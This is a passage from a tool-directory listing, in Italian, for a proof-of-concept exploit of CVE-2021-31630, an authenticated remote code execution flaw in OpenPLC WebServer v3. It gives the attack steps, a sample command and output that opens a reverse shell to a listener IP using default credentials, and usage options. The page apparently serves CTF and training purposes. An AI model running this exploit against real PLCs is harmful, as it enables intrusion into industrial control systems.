Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-31630 — Exploit POC per CVE-2021-31630 scritto in Python3 e che utilizza una reverse shell in C con modalità non bloccante | Kitploit
Strumenti/GitHubGitHub/flojboj/cve-2021-31630
ExploitSicurezza SCADA/ICSSfruttamento di Applicazioni WebCTFApprendimento e FormazioneSviluppo Payload
GitHubflojboj/cve-2021-31630

CVE-2021-31630

Exploit POC per CVE-2021-31630 scritto in Python3 e che utilizza una reverse shell in C con modalità non bloccante

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

OpenPLC WebServer v3 - RCE autenticato (CVE-2021-31630)


Questo exploit si basa sull'exploit di Exploit-DB realizzato da Fellipe Oliveira.

  • Per prima cosa, autenticati
  • Carica un file C malevolo
  • Compilalo
  • Avvia il PLC (avvia la reverse shell)
  • Ferma il PLC (non è necessario eseguirlo, la reverse shell è già stata avviata)
root@kitploit:~
└─# python3 custom_exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
[*] Authenticated.
[*] C file uploaded. Waiting for compilation.
[*] Compiled, probably.
[*] Started PLC, you should get your reverse shell now.
[*] Stopped PLC.

Come usarlo

root@kitploit:~
python3 exploit.py --url <> --username <> --password <> --listenerip <> --listenerport <>

Opzioni:

  • --url - URL dell'OpenPLC
  • --username - nome utente
  • --password - password
  • --listenerip - indirizzo IP del listener
  • --listenerport - porta del listener

NOTA: Questo exploit è creato come PoC; usalo solo per scopi educativi o CTF - https://flojboj.org/article/WifineticTwo

Scarica lo strumento